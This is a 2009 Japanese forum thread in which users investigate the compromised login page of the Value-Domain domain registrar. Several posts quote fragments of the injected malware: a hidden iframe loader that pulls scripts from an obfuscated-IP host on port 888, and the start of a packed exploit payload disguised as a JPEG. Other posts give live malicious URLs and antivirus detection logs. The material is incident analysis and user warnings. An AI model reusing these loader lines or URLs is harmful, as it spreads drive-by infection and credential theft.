自分が、jsオフでも別の手段でフォローするようなサイト作りをしてるから、
それが無いサイトを見ると、なんかムカつく。
630名無しさん@お腹いっぱい。:2009/07/08(水) 17:25:55 0
ブラウザで表示されているリンクをクリック、または立ち上げるだけで
それ以上の操作を必要することなく、
ユーザはふと気付くと、シームレスに自動でソフトがインストールされ使用できる状態になっている

そう考えると、無駄な操作がはぶけてストレスのたまらない便利な技術だよね、これ
631名無しさん@お腹いっぱい。:2009/07/08(水) 17:26:52 0
gigazineに垂れ込もうかと思ったら、
jsオフだとメールフォームが表示されない。
632名無しさん@お腹いっぱい。:2009/07/08(水) 17:27:39 0
そこはONにしてもいいだろ
633名無しさん@お腹いっぱい。:2009/07/08(水) 17:28:10 0
634名無しさん@お腹いっぱい。:2009/07/08(水) 17:28:33 0
>>605
なるべくならIE以外を使用する
635名無しさん@お腹いっぱい。:2009/07/08(水) 17:29:40 0
>>633
これ踏むとどうなるの?
636名無しさん@お腹いっぱい。:2009/07/08(水) 17:30:16 0
VDの公式告知マダー
637名無しさん@お腹いっぱい。:2009/07/08(水) 17:31:08 0
>>607
狙ってるわけじゃなくてきっと無差別攻撃の結果陥落しただけ
638名無しさん@お腹いっぱい。:2009/07/08(水) 17:34:40 0
このスレだけレンタル鯖板で異常なほど速い……速すぎだろ
異常事態だから当然かもしれんが
639名無しさん@お腹いっぱい。:2009/07/08(水) 17:35:19 0
落書きはすぐに消さないと、ルーズな住民が多い場所だと認知されて、
どんどん落書きが増え、治安も悪くなるって話があるけど、それと同じじゃね?

カウンターや広告の不具合がずっと続いてるし、サポートBBSもろくな対応をしない。
そういう状況だと狙われやすいんじゃないのかな?
640名無しさん@お腹いっぱい。:2009/07/08(水) 17:36:26 P
そーいやカウンターは使ってないけど、あれは大丈夫なのか?
641名無しさん@お腹いっぱい。:2009/07/08(水) 17:36:33 0
>>637
いや、DNS攻撃の頃からターゲットはしてたと思うよ
642名無しさん@お腹いっぱい。:2009/07/08(水) 17:38:02 0
とりあえず、俺らに出来ることは、出来るだけこの件を多くの人に広めることだ。
俺はgoogleアドセンスのスレにこの件を書いてきた。
お前らもVD使ってそうな人がいるスレには何か書き込んだほうがいいかも。
643名無しさん@お腹いっぱい。:2009/07/08(水) 17:38:34 0
maliciousとかどんだけー
644名無しさん@お腹いっぱい。:2009/07/08(水) 17:41:35 0
これでうっかりVDが消滅されても困るんだけどなw
645名無しさん@お腹いっぱい。:2009/07/08(水) 17:42:20 0
>>461がガセネタであればいいのだが。
646名無しさん@お腹いっぱい。:2009/07/08(水) 17:46:26 0
出たり消えたりしてるみたいだからサポートが確認出来てないのかもしれんが
それだと根本的に何の対策もしてないって事だよな
647名無しさん@お腹いっぱい。:2009/07/08(水) 17:49:04 0
問題を認識してるのにしらばっくれてるのと、
問題を認識できていないのと、
どっちが怖い?
648名無しさん@お腹いっぱい。:2009/07/08(水) 17:49:10 0
649名無しさん@お腹いっぱい。:2009/07/08(水) 17:49:11 0
ここまで騒ぎになってる割に「ドメインを乗っ取られた」系の被害(報告)が無いのが不思議。
650名無しさん@お腹いっぱい。:2009/07/08(水) 17:52:52 0
219.101.229.188/login.php

↑の</HEAD>直前のjs.src ="http://1856317799:888/jp.js";ってのがウイルス?
651名無しさん@お腹いっぱい。:2009/07/08(水) 17:53:41 0
派手にのっとることが目的じゃなくマルウェア配布が目的なので
こっそりとやってるのです
652名無しさん@お腹いっぱい。:2009/07/08(水) 17:54:01 0
せめて危険なURLは全角で書いてくれ
クリックするだけでウイルス感染するかもしれんだろ
653名無しさん@お腹いっぱい。:2009/07/08(水) 17:54:09 0
ごめんリンクになってる削除依頼出すから踏まないでね
654名無しさん@お腹いっぱい。:2009/07/08(水) 17:56:34 0
>>650
おいおい何してんだお前
655名無しさん@お腹いっぱい。:2009/07/08(水) 18:01:41 P
ちょっと出掛けてた間にまたえらい騒ぎになってるな。
で騒ぎが一段落したら、またさっきみたいに改竄は捏造だとか
名無しソースは当てにならんとか言う奴出てくるのかな。
656名無しさん@お腹いっぱい。:2009/07/08(水) 18:02:36 0
おいおい、なんか、どんどん被害大きくなるな。
大丈夫か?この会社は。
657名無しさん@お腹いっぱい。:2009/07/08(水) 18:05:05 0
実被害が出ない限り騒ぎそのものはこのまま収束する可能性が高い
その後で騒ぐ奴は粘着としてスルーされるだろうし

まぁ無関係の俺は公式リリースをwktkして待つぜw
658名無しさん@お腹いっぱい。:2009/07/08(水) 18:06:18 0
ギャーまじですか
今頃気づいたorz

>>649
2週間ほど前によくわからん理由でVDアカウント凍結された><
だれかにアカウント乗っ取られた可能性がある
サポートに連絡した後、担当部署の対応待ちだったんだが
まったく音沙汰なくてしびれを切らしてたところ
659名無しさん@お腹いっぱい。:2009/07/08(水) 18:07:24 0
>>658
「よくわからん理由」plz
660名無しさん@お腹いっぱい。:2009/07/08(水) 18:13:36 0
>>659
自分では購入した覚えのないドメインを指摘され、それが利用規約に違反してるといわれた
管理画面にそもそも入れないから確認しようがないんだけど
661名無しさん@お腹いっぱい。:2009/07/08(水) 18:18:54 0
2週間前ってこのスクリプト組み込まれてたの?
662名無しさん@お腹いっぱい。:2009/07/08(水) 18:22:00 0
その疑問はあるね・・・
違うパターンで乗っ取られた可能性も考えられるから、まだ何ともいえない
663名無しさん@お腹いっぱい。:2009/07/08(水) 18:27:35 0
本人がよくわからんならデジロに対して証明はできんな
この会社は「可能性がある」だけじゃ絶対自分の非とは認めないだろ
664名無しさん@お腹いっぱい。:2009/07/08(水) 18:28:41 P
これか。

>639 :名無しさん@お腹いっぱい。 :2009/06/24(水) 08:25:45 0
>Value-domainとxreaは最低、
>勝手にアカウントを取り消された。
>10個前後のドメインと借りたサーバはパー。
>メールしても返事なし。

10ドメインと鯖は痛いな。
665名無しさん@お腹いっぱい。:2009/07/08(水) 18:38:11 0
もしかしたらかなり前からクラッカーに狙われていて
裏で目立たないようにいろいろ動いていたのかも。
ウィルスも常に表示するよりたまに表示するほうが
気づかれにくくて対策されないし。
666名無しさん@お腹いっぱい。:2009/07/08(水) 18:39:37 0
こえー

アンカーすらまともにつけられない阿呆もいるし
667名無しさん@お腹いっぱい。:2009/07/08(水) 18:45:38 0
10個前後と言ってる時点で怪しいと思うんだけど。へん?
668名無しさん@お腹いっぱい。:2009/07/08(水) 18:46:10 0
>>664
それ別の人。
ドメイン持ってるの2つだが、長年使ってただけに失うのは痛いわ
あああなんとかして移管手続きとれないものか
669名無しさん@お腹いっぱい。:2009/07/08(水) 19:00:41 0
Windows Vista または Windows Server 2008 を使用しているお客様については、
Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、
この脆弱性の影響を受けません。


だってよ
XP\(^o^)/ オワタ
670名無しさん@お腹いっぱい。:2009/07/08(水) 19:15:51 0
671名無しさん@お腹いっぱい。:2009/07/08(水) 19:24:14 0
>>669
Win7にするといいおww
でも、今回の乗っ取りはOSは問題じゃないぜ
事件はデジロ内部で起こっている
672名無しさん@お腹いっぱい。:2009/07/08(水) 19:26:03 0
あのすいません
こんな時に何ですがVDネム鯖が6月のはじめからずっと脂肪してる件については…
673名無しさん@お腹いっぱい。:2009/07/08(水) 19:28:03 0
どこに移転するかが問題だなぁ・・・
どこかおすすめありませんか?

ドメイン管理しか使ってないけど。
674名無しさん@お腹いっぱい。:2009/07/08(水) 19:29:17 0
レジストラは鉄板があんまないよなあ
675名無しさん@お腹いっぱい。:2009/07/08(水) 19:29:21 0
そういう話は専スレでやれ
676名無しさん@お腹いっぱい。:2009/07/08(水) 19:33:05 0

value-domain 御中

口コミのパワーをなめんなよ

隠蔽したら口コミで広がるからね
677名無しさん@お腹いっぱい。:2009/07/08(水) 19:34:36 P
>>668
てことは、
ひょっとすると同時期に同じような被害を受けてる人が複数いるって事になるかも。
何が起きているのか考えると、ちょっと恐ろしいね。
678名無しさん@お腹いっぱい。:2009/07/08(水) 19:36:53 P
報告はないけど、カウンターは改竄されてはいない?
カウンターってあまりログインしないからわからんのかな。
679名無しさん@お腹いっぱい。:2009/07/08(水) 19:37:40 0
>>660
> 自分では購入した覚えのないドメインを指摘され
自分で購入した覚えがないなら、なんてドメインか晒せるだろ?
ドメイン名出してみ。
680名無しさん@お腹いっぱい。:2009/07/08(水) 19:39:16 0
>>678
カウンターはウイルス関係なく先々月からのネームサーバ障害でずっと死んでるだろ?
681名無しさん@お腹いっぱい。:2009/07/08(水) 19:39:28 0
>>660
そのドメイン名を具体的に教えてほしい.

身に覚えがないなら, 個人の特定は無理だと思うから.

いったい何に使われているドメインなのか興味がある.
682名無しさん@お腹いっぱい。:2009/07/08(水) 19:40:10 0
>>572
忍者ツールズにも通報する!

>>635
HTMLソースを解析して表示するだけだから安全です。

http://1856317799:888 このアドレスをnslookupするとhome.ne.jp内のIPじゃね?







今回の一件でVDには個人的にに失望した。
お前ら、どこに移管する?
683名無しさん@お腹いっぱい。:2009/07/08(水) 19:41:40 0
移管は止めんが移管先に関する話題は専スレで
684名無しさん@お腹いっぱい。:2009/07/08(水) 19:42:17 0
>>660
もうちょっと詳しく!!
685名無しさん@お腹いっぱい。:2009/07/08(水) 19:42:52 0
>>682
リンク貼るなよ
686名無しさん@お腹いっぱい。:2009/07/08(水) 19:44:27 0
URLStatusContent Type
 tp://ax.xrea.com/login.php  200  text/html 
 tp://1856317799:888/jp.js  200  text/javascript 
 about:blank  200  text/html 
 tp://0x6EA52967:888/dir2/show.php  200  text/html 
 tp://0x6EA52967:888/dir2/go.jpg  200  text/javascript 
 tp://1856317799:888/counter.htm  200  text/html 
 p://ct2.shinobi.jp/sc/1298877  200  text/javascript 
 p://ct2.shinobi.jp/sd/1298877  200  text/javascript 

なにこれ・・・・
687名無しさん@お腹いっぱい。:2009/07/08(水) 19:44:41 0
To: 682
Norton Safe Web
ttp://safeweb.norton.com/report/show?name=110.165.41.103

Webサイトの場所 香港
688名無しさん@お腹いっぱい。:2009/07/08(水) 19:46:47 0
だから全角でと何度も…
689名無しさん@お腹いっぱい。:2009/07/08(水) 19:48:11 0
inetnum: 110.165.32.0 - 110.165.63.255
netname: FKT-HK
descr: Flat/Rm D Block 1, 8/F
country: HK
role: FEIKE TECH LIMITED - network administrator
address: FLAT/RM D BLK1 8/F 162-170 TAI LIN PAI RD KWAI CHUNG NT HK
country: HK
phone: +852 82050331
e-mail: [email protected]
admin-c: FTLn1-AP
tech-c: FTLn1-AP
nic-hdl: FTLn1-AP
mnt-by: MAINT-FKT-HK
changed: [email protected] 20090408
source: APNIC
changed: [email protected] 20090408
690名無しさん@お腹いっぱい。:2009/07/08(水) 19:49:10 0
>>683 専スレを示せよ
691名無しさん@お腹いっぱい。:2009/07/08(水) 19:49:30 0
ttp://〜」にしても、専用ブラウザだとリンクするし、
全角にするのが一番無難ですね。
692名無しさん@お腹いっぱい。:2009/07/08(水) 19:51:53 0
>>690
もうそのパターンはしつこいって。
一応レスしとくから勝手に探して勝手にやってね。
693名無しさん@お腹いっぱい。:2009/07/08(水) 19:51:58 0
>>690
>>683じゃないけど
もの凄い勢いで誰かが有料レンタルサーバーを探すスレ 13
http://pc11.2ch.net/test/read.cgi/hosting/1229551534/
あたりじゃね?
694名無しさん@お腹いっぱい。:2009/07/08(水) 19:58:30 0
とりあえずはVDをヲチするしかないの?
誰かお茶持ってきてー
695名無しさん@お腹いっぱい。:2009/07/08(水) 19:59:08 0
さくらはどうでしょう
他社で取得した独自ドメインを利用する
http://support.sakura.ad.jp/support/manual/rs/setdom_c.shtml
696名無しさん@お腹いっぱい。:2009/07/08(水) 19:59:31 0
乗り換え先の話題はこっちで

お前らお勧めのレジストラ教えてください
http://pc11.2ch.net/test/read.cgi/hosting/1010742997/
697名無しさん@お腹いっぱい。:2009/07/08(水) 20:01:01 0
>>694
∧_∧
( ´・ω・) みなさん、お茶が入りましたよ・・・・。
( つ旦O
と_)_) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦
698名無しさん@お腹いっぱい。:2009/07/08(水) 20:02:18 0
Keysysドメインを2個所有している自分には隙が無かった…
699名無しさん@お腹いっぱい。:2009/07/08(水) 20:07:34 0
>>698 何の隙?
700名無しさん@お腹いっぱい。:2009/07/08(水) 20:10:18 0
>>690
まず次のところを見る:
http://www.domainname.ne.jp/

リンククラブは除外するのが無難:
http://www24.atwiki.jp/linkclub/

あとは696の紹介されたスレッドで聞くのが適当だと思う:

お前らお勧めのレジストラ教えてください
http://pc11.2ch.net/test/read.cgi/hosting/1010742997/l50
701名無しさん@お腹いっぱい。:2009/07/08(水) 20:16:04 0
お茶あちーよ!
麦茶にしてくれ!
702名無しさん@お腹いっぱい。:2009/07/08(水) 20:19:49 0
そうそう、msvidctl.dllの脆弱性は確かにActiveXコントロールだからIEだけだけど
同時にFlashPlayerとAdobeReader(Acrobat)の脆弱性も使います。
この2つは最新バージョンにしていなければNetscapeプラグイン系
(Firefox、Opera、Safari、etc.)もやられるのであしからず。
703名無しさん@お腹いっぱい。:2009/07/08(水) 20:27:40 0
704名無しさん@お腹いっぱい。:2009/07/08(水) 20:28:48 0
お名前.comが移管380円のキャンペーンやってるから乗っかってみようかな
705名無しさん@お腹いっぱい。:2009/07/08(水) 20:38:57 0
うちはccTLDなので心中するしかなさそうです/ ,' 3  `ヽーっ
706名無しさん@お腹いっぱい。:2009/07/08(水) 20:42:05 0
>>692 お前はほんとに役に立たない奴だなw
707名無しさん@お腹いっぱい。:2009/07/08(水) 20:44:05 0
しかしウイルス置いてあるサイトのアクセス数がすごい勢いで増えてるな
708名無しさん@お腹いっぱい。:2009/07/08(水) 20:48:08 0
サイトジャックが済んでも、ゼロデイ攻撃のためにとりあえずそのまま放置しておくんだろうね。
709名無しさん@お腹いっぱい。:2009/07/08(水) 21:11:42 0
闇市場でアカウント情報を売買してるって言うしな
710名無しさん@お腹いっぱい。:2009/07/08(水) 21:21:39 0
>>704
また随分いいタイミングでのキャンペーンだなぁ。いつのまにか独自DNS使えるようになってるし。

・・・まさか・・・まさかな・・・。
711名無しさん@お腹いっぱい。:2009/07/08(水) 21:22:22 0
>>708
ゼロデイ攻撃の意味わかってるか?
712名無しさん@お腹いっぱい。:2009/07/08(水) 21:23:10 0
>>711
だからゼロデイ攻撃を起こすときに乗っ取ったサイトをいっぺんに書き換えるでしょ
713名無しさん@お腹いっぱい。:2009/07/08(水) 21:33:41 0
頭の悪い会話は他所でやってくれよ
後から来た人がこの騒ぎを冗談と思ったらどうするんだ
714名無しさん@お腹いっぱい。:2009/07/08(水) 21:37:58 0
ESETで踏み抜いてみた。
>219.101.229.188 ←やられてる

2009/07/08 21:23:11
HTTP フィルタ
ファイル http://110.165.41.103:888/dir2/go.jpg
JS/Exploit.CVE-2008-0015.A.Gen トロイの木馬 接続が切断されました - 隔離しました
XXXXXXX\xxxx
アプリケーションによるウェブへのアクセスにおいて脅威が検出
されました: C:\Program Files\Internet Explorer\iexplore.exe.
715名無しさん@お腹いっぱい。:2009/07/08(水) 21:40:21 0
ごめん
全角にしていなかった orz
716名無しさん@お腹いっぱい。:2009/07/08(水) 21:40:29 0
>>714
ってことは画像ファイルに偽装してるってことです?
Javascript/FLASHきってても危ないのです?

うちVDでドメインを20個以上管理委託してるんですが…
今回の件の公式アナウンスがほしい
717名無しさん@お腹いっぱい。:2009/07/08(水) 21:41:27 0
どいつもこいつも感染自慢するのはいいがurlには気を使ってくれよ
そんなに感染者増やしたいのか?
718名無しさん@お腹いっぱい。:2009/07/08(水) 21:45:55 0
これか、
○アクセス解析用のサーバー
ax2(219.101.229.188) Xeon 2.40 GHz×2 2GB DELL PowerEdge 2650

レンタルアクセス解析サービス 謎のあやしい文字 & う ・・・
いまは、でない。気のせいだったのか・・・ 気のせいだったんだろうなぁ
でも、どこででたんだろう・・・ いまいち記憶が・・・
719名無しさん@お腹いっぱい。:2009/07/08(水) 21:47:29 0
>>716
【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/

ここの562以降から詳しく解説されてるよ
720名無しさん@お腹いっぱい。:2009/07/08(水) 21:48:15 0
>>464

> お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
> が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。
>
> ご確認の上、適宜ご作業いただければ幸いです。

↑はマジか?

マジだとしたら、とことんダメだなこの会社、
隠蔽体質にもほどがあるな
なぜ「改竄があったが修正した」と言えん
実際埋め込まれているソースは確認したし、保存してるで
事実を話そうや
721名無しさん@お腹いっぱい。:2009/07/08(水) 21:48:38 O
CORESERVERのスレでも、異変がおきてるっぽくない?
722名無しさん@お腹いっぱい。:2009/07/08(水) 21:49:17 0
>>714
おま
Live2chが勝手に画像表示しようとしてカスペが反応したぞw

Exploit.JS.DirektShow.b
723名無しさん@お腹いっぱい。:2009/07/08(水) 21:50:14 0
>>720
じゃあお前がその持ってる証拠を突きつけて戦ってくれ。
現象を見てない俺の通報じゃこう言われたら引き下がるしかない。
724名無しさん@お腹いっぱい。:2009/07/08(水) 21:51:48 0
改竄を確認できて無いだけで安全を確認できてるわけじゃないんだよな
725名無しさん@お腹いっぱい。:2009/07/08(水) 21:52:48 0
正直ここ2週間くらいアカ消されたとか言う奴が粘着荒らししまくってたから何も信用できん
726名無しさん@お腹いっぱい。:2009/07/08(水) 21:53:26 0
>>721
管理が同じだからな
727名無しさん@お腹いっぱい。:2009/07/08(水) 21:59:09 0
俺が報告したらこういう返事がきたよ

[2009-07-08 19:27:43] サポートからメッセージが追加されました。

ご連絡、確認させていただきました。

いただきました件につきましては、カスタマーサポート(受付部門)では対応できませんため、担当部門に申し送りさせていただきますが、現在は、私どもカスタマーサポート(受付部門)に対して、
 ●弊社・担当部門からの報告が入っていない
という状況です。

そのため、本件につきましては、真偽確認の上、そのような状況にございました場合は、担当部門判断においてご案内させていただきます。
但し、あくまでも、私どもは申し送りを行なうところまでの対応になりますことから、
 ●実際に障害が発生していた場合 → 障害ページなどでの一括連絡
 ●事実確認できない場合 → 連絡は行なわない
という形のご対応になる場合もございますことを、あらかじめご了承いただきますようお願い申し上げます。
728名無しさん@お腹いっぱい。:2009/07/08(水) 22:04:13 O
>>726
ごめん、書き方が悪かった…

こんな風に書かれてたよ↓

SSLサーバ(ss1.coressl.jp)が死んでる?
SSL無効 or ss1.xrea.com経由ならつながる
729名無しさん@お腹いっぱい。:2009/07/08(水) 22:06:27 0
管理側で確認が出来ないのは、
公式のWeb鯖かDNS鯖が乗っ取られてて
管理側からのアクセスは正常に見えるよう偽装してるんじゃないだろうか?
730名無しさん@お腹いっぱい。:2009/07/08(水) 22:06:29 0
それは関係ないw
731名無しさん@お腹いっぱい。:2009/07/08(水) 22:08:57 0
>>727 この担当部門ってほんとに存在してるのかなぁ?
なんかcore、vd使ってたらこの担当部署って外注なきがするw
732名無しさん@お腹いっぱい。:2009/07/08(水) 22:09:11 0
>>723
デジロの隠蔽は許されない!
今キタ人の為に、とりあえず事実をまとめようか

【必読Noまとめ】

>>29
>>31
>>32
login.phpに埋め込まれていた具体的なJavaScriptは↑で間違いない

>>92
この魚拓も俺が保存しているものと一致する(JavaScriptをOFFにして開けること)

>>93
>>95
埋め込まれていたmalware(キーロガー)を実行した勇者がいた(スクリーンショットあり)

>>286
こちらにもlogin.phpが改竄されてmalwareが埋め込まれていた履歴が残っている

>>34
埋め込まれていたJavaScriptを置いている香港サーバーの結果は↑のとおり
733名無しさん@お腹いっぱい。:2009/07/08(水) 22:09:41 0
>>727
これ要するに「担当部門が大混乱中で返事が返ってこないからわからん」って言ってるよな
734名無しさん@お腹いっぱい。:2009/07/08(水) 22:13:37 P
>>731
外注というか、在宅のバイトじゃなかったっけ
735名無しさん@お腹いっぱい。:2009/07/08(水) 22:14:34 0
●弊社・担当部門からの(日本語による)報告が入っていない
736名無しさん@お腹いっぱい。:2009/07/08(水) 22:14:39 0
こんな規模の会社で受付部門も担当部門も明確な区分けなんて
あるとは思えないのだが
737名無しさん@お腹いっぱい。:2009/07/08(水) 22:15:22 0
>>733いまでもなんとか技術うけおってくれてる、元社員にしぶしぶ連絡すっかーなー
でも保守料高くつんだよ。おれがちょちょいってなおしてみるから
おめーらはガタガタ騒がずまってろ、こんなもん文系の俺でもなおせるわww

と訳した
738名無しさん@お腹いっぱい。:2009/07/08(水) 22:16:36 0
>>97
がキーロガーのスクリーンショットな
739名無しさん@お腹いっぱい。:2009/07/08(水) 22:24:53 0
誰かWikiつくって
740154:2009/07/08(水) 22:25:01 0
>>727
俺の時の回答と同じだよ。2営業日経っても同じ回答とか。。。

もーいいや
既に移管承認メールで承認ポチッたし、あともう少しで糞VDとは縁が切れる
741名無しさん@お腹いっぱい。:2009/07/08(水) 22:28:33 0
担当部門が報告無く勝手に対処(隠蔽)しているかもしれないが、
受付部門では分からないとでも言って、言い逃れするつもりなのだろうか
742名無しさん@お腹いっぱい。:2009/07/08(水) 22:50:24 0
PHPの改竄前に、全ドメインの顧客情報が漏れいたのではないか?
という疑いを捨てきれない。(PHPを改竄できる権限があるならDBも見ることができた可能性を考慮)

ユーザーがすぐに気がつくJavaScriptでキーロガーを埋め込んだ理由は、
ハッキング済みだという犯行声明のようなものだったのではなかろうか?
ユーザーが他のサイトで使うIDやPASSをも狙ったキーロガーだったのかもしれないが、すぐに見つかるJavaScriptを使用する手口といい、PHPを改竄する権限がありながらわざわざやることでもないと思った次第。
743名無しさん@お腹いっぱい。:2009/07/08(水) 22:53:00 0
もうだめぽ
744名無しさん@お腹いっぱい。:2009/07/08(水) 22:56:42 0
アクアナの方は現在進行形なんだよね?
745名無しさん@お腹いっぱい。:2009/07/08(水) 22:57:50 0
ヌー速の方でもスレ立ってるみたいだが
746名無しさん@お腹いっぱい。:2009/07/08(水) 22:58:34 0
【Geno再来?】某有名レンタルサーバがやられた【新手法】
http://tsushima.2ch.net/test/read.cgi/news/1247061049/
747名無しさん@お腹いっぱい。:2009/07/08(水) 22:59:34 0
>>744
進行形。まだ不正コードが存在。

あと、今見るとトップページにも同じ不正コードがあるんだが、さっきからあったっけ?

219.101.229.188/

ログインフォームのと同じく、188のみに存在。189にはなし。
748名無しさん@お腹いっぱい。:2009/07/08(水) 23:00:52 0
捏造ネタで煽ってる人はそろそろ次のネタ考えないとタイムリーさに欠けちゃうよねw
749名無しさん@お腹いっぱい。:2009/07/08(水) 23:02:09 0
>>748
社員乙
750名無しさん@お腹いっぱい。:2009/07/08(水) 23:02:39 0
>>749
原点回帰かよww
751名無しさん@お腹いっぱい。:2009/07/08(水) 23:04:00 0
>>749
ああスマン

こんな事実はなく全部捏造だってネタレスで煽ってる人はそろそろ次のネタ考えないとタイムリーさに欠けちゃうよねw
752名無しさん@お腹いっぱい。:2009/07/08(水) 23:05:24 0
>>748
さっさと対策とれよ
753名無しさん@お腹いっぱい。:2009/07/08(水) 23:07:27 0
>>742
のような、デジロに都合の悪い書き込みがあると、
捏造ネタだと言って流そうとするタイムリーな人が現れるのです
754名無しさん@お腹いっぱい。:2009/07/08(水) 23:09:21 0
>>747
>>633ですでに報告済み


とはいえ、あいかわらずかわらないようだね
> wget -qO- http://219.101.229.189/ | md5; echo
9a351be22ecc97745590f280a4f29cce

> wget -qO- http://219.101.229.188/ | md5 ; echo
a8ad424c1d68b71feb0797e415ba0a86
755名無しさん@お腹いっぱい。:2009/07/08(水) 23:10:00 P
タイムリーくん
絶対無理ー
756名無しさん@お腹いっぱい。:2009/07/08(水) 23:11:47 0
>>754
自分が気づいてなかっただけか、thanks
757名無しさん@お腹いっぱい。:2009/07/08(水) 23:13:10 0
VALUE DOMAIN のログインページ改ざん スラッシュドット・ジャパン
http://slashdot.jp/security/article.pl?sid=09/07/08/0432248
758名無しさん@お腹いっぱい。:2009/07/08(水) 23:13:17 0
自分のドメイン2個はwhoisで見る限りは不審な点は無し
すぐにでも逃げ出したいが、今ログインすると危ないと…
どうすりゃいいんだろう

Vista+Firefoxなのでクライアントは大丈夫だが、VD側にある情報は手の打ちようがないな
759511:2009/07/08(水) 23:14:30 P
スレ加速してて驚いた。いやはや大変なことだな。
760名無しさん@お腹いっぱい。:2009/07/08(水) 23:16:14 0
非常時あげ
761名無しさん@お腹いっぱい。:2009/07/08(水) 23:16:57 0
あがってねーや
762名無しさん@お腹いっぱい。:2009/07/08(水) 23:30:39 0
219.101.229.188/をgoogle chromeやFirefoxで開くと
「このサイトにアクセスするとコンピュータに損害を与える可能性があります。」
とブロックしますね、一応Port888を含む怪しいポートはFWで閉じての確認です

ttp://1856317799:888/jp.js ←Firefoxで見るとこのアドレスのjsに接続するようだが末尾のjpがなんだか嫌だな
763名無しさん@お腹いっぱい。:2009/07/08(水) 23:32:25 0
568 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 19:13:30 ID:???
じわじわと何やられてんのかなーと調べ中。どうみてもあやしいjp.jsの中身を見てみる
>>563もそうだけど、大丈夫かは明確じゃないんでwindowsでは調べるのやらないほうがいいと思います。
とりあえず俺はFreeBSDなんでそれでやってます

>more jp.js
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("J=")==-1)
{var js = document.createElement('iframe');
js.src ="http:¥/¥/0x6EA52967:888/dir2/show.php";
width=0; height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
以下略

なんか差し込まれてるね
とはいえ、show.phpはさすがに何も吐いてこない、うーむ。さらに後ろを見てみる

var fr = document.createElement('iframe');
fr.src ="http:¥/¥/1856317799:888\/counter.htm";
width=0;
height=0;
try {document.getElementsByTagName('head')[0].appendChild(fr);}

なんか呼ばれてるcounter.htmをみてみる
<!-- shinobi ct2 -->
<script type="text/javascript" src="http://ct2.shinobi.jp/sc/1298877"></script>
<noscript><a href="http://ct2.shinobi.jp/gg/1298877" target="_blank"><img src="http://ct2.shinobi.jp/ll/1298877"
border="0" alt="<A5><AB><A5><A6><A5><F3><A5><BF><A9>`"></a></noscript>
<!-- /shinobi ct2 -->

ん? 忍者ツールだと……。
もうちょっと調べてみるかな。なにやってんだろうね
764名無しさん@お腹いっぱい。:2009/07/08(水) 23:33:53 0
574 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 19:32:26 ID:???
いろいろしらべていくと、あぁなるほど

で、
<script src='go.jpg'></script>
で、問題のjpgをスクリプトとして読み込ませてますね

他の関係なさそうなファイル見てみると
if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1)
ともあるので、
これも同じように、IE6とIE7の狙い撃ちかな? わざわざ律儀ですね

でも、whoisとかで調べていくと、
hellh.netということで、
おそらく、本体は、各種ネトゲのアカウントハックってところでしょうかね
ネトゲやってないと問題ない、なんて思っても、
この手のウイルスはレジストラに残るとネットワーク重くしたりといろいろうざいんで、
対応したほうがいいですね

とりあえず俺は大体わかったんで、ここまで
765名無しさん@お腹いっぱい。:2009/07/08(水) 23:35:52 0
563 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 18:31:04 ID:???
改ざん?されたらしいほうのところを調査

gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな

でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg

一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
以下長いので略

まぁ、スクリプトが偽装してある、これがまだ回避策のみでパッチがででてない虚弱性
972890
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx
なのかな
766名無しさん@お腹いっぱい。:2009/07/08(水) 23:40:17 0
>>765
「虚弱性」で台無しだな
767名無しさん@お腹いっぱい。:2009/07/08(水) 23:42:21 0
え? 突っ込みどころはそこ?
768名無しさん@お腹いっぱい。:2009/07/08(水) 23:44:10 0
全部捏造かもしれん
769名無しさん@お腹いっぱい。:2009/07/08(水) 23:45:36 0
デジロは永遠です
770名無しさん@お腹いっぱい。:2009/07/08(水) 23:45:47 0
臀部劣情かもしれん
771名無しさん@お腹いっぱい。:2009/07/08(水) 23:45:47 0
さっさと対応しろよ
糞社員
772名無しさん@お腹いっぱい。:2009/07/08(水) 23:51:56 0
糞社員と申されましても、対応できないものはできません。

・ドメインの個人情報が全て漏れているのでは?
とか、
・ウイルスの存在
とか、
都合が悪い書き込みを流すことが役目なのです
773名無しさん@お腹いっぱい。:2009/07/08(水) 23:52:46 0
え? それも外注だよね?
774名無しさん@お腹いっぱい。:2009/07/08(水) 23:54:57 0
俺もgo.jpgだけ喰らったぽいんだけど、
ウイルススキャン3社ので、全スキャンしたけど何もでない・・・でも不安すぎる
775名無しさん@お腹いっぱい。:2009/07/08(水) 23:55:35 0
もちろんです
776名無しさん@お腹いっぱい。:2009/07/08(水) 23:57:07 0
.netと.nuと.jpを別の所に移管したいのだがいい所ない?
777名無しさん@お腹いっぱい。:2009/07/08(水) 23:57:27 0
>>774
go.jpgはウイルス本体じゃないそうです

582 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 19:46:58 ID:???
調査ついでに、FreeBSDからWindowsに移って各種ウイルスソフトの対応状況も確認してみたよ
とりあえず試験用に5台あるので、そっちでチェック

ノートン、カスペルスキー、avast、nod32はgo.jpgに反応した。なかなか優秀ですね
ウイルスバスターは反応なし。残念ですね


でも、このjpg自体が本体ではなく、それを利用してくる、別のウイルス本体のexeがあるので、
そっちに反応してればおkですね。これは未確認だけども

624 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 22:30:16 ID:???
バスターで反応
ウイルスが見つかりました。
隔離不能、手動での処理が必要です。
JS_DLOADER.BD

vistaでIE8なんだけどほっといても大丈夫なの?
778名無しさん@お腹いっぱい。:2009/07/09(木) 00:01:28 0
>>777
